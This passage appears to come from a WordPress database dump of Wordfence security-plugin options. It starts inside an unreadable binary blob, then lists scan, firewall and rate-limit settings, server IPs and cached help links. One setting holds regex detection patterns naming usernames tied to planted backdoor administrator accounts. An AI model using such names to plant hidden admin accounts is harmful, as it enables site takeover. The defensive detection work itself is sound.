\"I\\�k����KhqهNq#�88$��; ��tY\\9e+�rŋk>l׽x-~\\�^\\��U\\O~+~�:)~�$7Ԕ�H��^���g���l���f��⦅O�f�qsL���qW�+����Y8q˶_�+��o���j��������;J�;���~��}Uq��Mq�琸���xp6Y<�.W��[���\'��_4�\'�k�_�O�\\O�\\O��g�G����Ŀ�<ĿWΊ�m��+�¾1ШF��C�����HR�]�J��~V����\Z�D�!1y{��ܳY��Yw%bVI�>!f�͋E��)�;�ŋ�|��I�{R��U+^�JT~LIVGI46�K4\r�J�d�p�D��D��dS��d�Q7ɖ�A=A�D�c�d��k�]��-C�A�>�ނ\n���}Yc#Vbz@ ��Y+�LN�X-\\�.CJl\Z]$6�L$�׏Hl��Kl�.I��7I�Ӓ���%�|��eq��u����i���S���s�I[K�gk��+k��瘣�]�$��@8��ߑ}*	�2��ؒib��C��L��\"k�$�\nQr-�Y�Qrf+��2-���$���&�Y�Y�-����*aIn��Hn�hH��~���$飫%�M�;��;ѯ$���Hrn.Jr\'$yF����.I�QSI��I��Iak���P.)n��wHJ��%oK*=�I*r$U}a��Վ��8I��D�D��fܓԥa$u�ڒ��I������:�䉞���8V���#y�攤�<T��� i]AI���N���{���G�)�-N��s%��$H�Va%c�%���d�K2��d2�E2��d���{��dn9T���wo�@�YJ��=8�J�jBH0\'%��*	�5VB:�EB\Z_���%�c�J�r뎄:�!���HHXׯJ���JD�?$b�i��ݨD2a+�7�J�$��p�źC��]֒�Cw%����U�M�U���U�T5�@�f\'U�}�j@�H�J�.�H�YK��^�ͷ~I���I�`̥ۦ	RN�tOv�԰\"Uz��/5�&w��&��RӧR�ن�R����վ���w��X���Bz:/u��&u\"�J��K��Б��K��W�\'��^��ϸ���/��G��#��u����U�Ҡэ�sQ!��}��!�I/UKÃ�H#���W}�W���k����u��p�F_9*�騔�LђƉf��7B�	M҄n�-/�&u�m�`�m�.���$��Ҕ�\\iʋjijb�4mRW��%M��-ͼ�NzǧWz7��I�4��Yz�Vi^}�4�{��薕�xs�����_ZڰNZއ�V�H+wOK+[J�,ӥU�)Ҫ7����ZҚ��҇�\r�:�Fi�O����Y��x��11G��%}�J�u+����H�\'�H��I��K_�aK�W�H�?����r���^���,���dH[x��G��$Ki�k�V�:iG�giǭ`i\'�W��p_�}�R��M��7�@��B���]��?�GoHjZ���ҡG:ҡA�t�p�tD0-���~��.�V,��,C�����tP�k���ۼ�W���]�`=%]�H���J1Rȵ�R`I\n@H��P)�E��E���jt�X�)6e�w�,�_����I	�\")��;)�3XJM;\"�V��R�:���o�!_��\0H��R�F��Ӓ��\"�oR�	]*�Ke7\r�ʄ5ҥG�KP����)�Z�l�Cٚ\r��u�e�\"�d����æe��2��/�\r�d��2�e��v2��2�@�l����;2}�q�>r����o�T!3L��&_�N6�1�e�o��+ 2�u�2#���<Vv�n�̴�+3;�!3�3\'�H0�Y����z]vh���J��0AOf_�/�_ˎ�\'e�2�W)2�[Q2�ޏ2W�n����[9W��-���T7���/�y� ;ů�����|ZO�|���3����52�ɲ@�bY�|��\\X�����͏d�S�e��h�+�Q�+HGYk��*��\"Rvm�^ٵ�����e����Ȧ<Y䈁,:��,:��,�(�%��ݚ|,�\r~&Kl˒ԣd)�e�������;�,��\r��,�Yֻ]������!Y.2L�W��#�e<dųBY��HV��IV:�%+��)��\\(��{KV��$��,��\\�j�Kd���=l���n��re��N��Ų�?����rY��;�g��d�z2d/=�^5��^�e���eo�Y�6k����FY��eY;�)�d��z�7�z�1����eU�\0\"L6��I6�&��}�֔}[̓MUȦiWd��u�YX�l�Ô���E��k���n���D���雲?�ò�b�_\r������� �ɐ��d��{e(?C��M��W�p7;d����NF�+#>���U/����d�p͢FFÒdt�z�8C�Z�#c��+c1��8;d@���Q(pjd���e\"k[��U�L��Q&�J��/�ʔ\re�jt��mٿ|3ٿ�;r�A�|�G��`�|���|MN�|�\\�n����u����w�ɵ�dr��A����\\\\���|��q�4L�c�|�`�|��\\�wPMn�#��,߿n��\0���<Vn�G[n�=Wn��/7���<�+7�~Gn֝-?�l\"�\\;+���,�2�[\'��o������?�#?�~[~�6M�P�\\�@���l�Q����?˝N4ȝ�F��^�O�j�OH��=7��=�\n�&f�>�<�χP��r��&r_�g�Y�X\\ȗ���+�TxF� C����_�)���I�Gj��on��<a ��ԓ�T��qE�����:�<�g���A���J�$��\'���S~?��@�����S���ۣ�yIpy�K�<o�D^��,/��G�K���K+��ҡ!y��:�O�ȳY�8��I��k��!�Y�ZP�y_��U��m\nY��X ױ oe�����m.��v׃��fy���C)����;+;����n����Y�A�Z�a�I��}�|���|��S>*!�Ǣ��c?��/��ɿ��Ol��O�˿�ȧR�g�G�g�nȿ�u������ݑ�AS��b���	\\�ה*^� ��Tɡemr褳��$��J��1r�~��p^�zC��_��cw1�X��w�Д��l���R&\'ѳ��\0;9u&g�N�3�l��<�9Z29/맜�a��7œ���\"��HT,�����	��5\'���K���w���˗����D�J��|�v�B��C�20�X�Y�6�U�o>�P?��X�q�B�8D�a��b�D�ic�bK-X���K��}H�-�b\"I�36S��0M�{U��,]�絧��}D�/o�bߧ����\n����N������K��H���{Ta��Ha�Q��=ܧ�=械ߴ�p�R�p�)���pR��p�5Vx�7+<�9��C^>�\n/?m��p�¯�C�ﭦ�*�^sT�y�@<S�nU};��g)΋r�).�G*B+S�bEx���2�Vq�cJqe(Xq���\"�n��Fq�\"v�@����7lR���Yq�r��v��\"�q@�t�\"��\"EU�H�>Td\0���)��R��~T�̄*r34��ˊ���k����]Q�IWQn��(�)��*�G����^C�J�\"Eef���u��ꨨn������x���󮢱^K�챢�l�⥎��U�M�k3����׍�-$�����{o[E[t��3?N���蚹��ި��p�W�#�S��*>��+���(jl�����)��bt��bl����}�dزb���y���ի��wV��=����\0��T\0\Z�\n��\Zb�@�R O)PK�x��\n�6a�\n\"篂**�)k|���~��Fg*����]�k�V�\n�B�;�PޥP��R(f��3j���\0Ŋ�7�J#M�RP�\\u%^�j��T��+�w�+�]t��^���D��a�\\czN��3N��S���S��أ\\�5�Ԣ?U��W�5+u�Օ����=+7��Qnn�Pn�LVn�JW��v\\��ոr�TO��v����_��OJC�r��K�>-�r���rߵ*�����8���� \r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J	�����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B	����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;΢��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU�	/\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|��	��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo�	�=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\	tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x	����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#��	c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S؅�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��)	_+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X-	+NH⑋�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�޺ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','0','yes'),('needsNewTour_scan','0','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:3:{i:0;i:1629772200;i:1;i:1630031400;i:2;i:1630290600;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','','no'),('onboardingAttempt2','','no'),('onboardingAttempt3','license','yes'),('onboardingAttempt3Initial','1','yes'),('originalScheduledScanStart','1629513000','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1629713828.9547','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','0','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1629736371;300;51.195.210.108','yes'),('serverIP','1628994941;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1629489598','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1629755547','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|h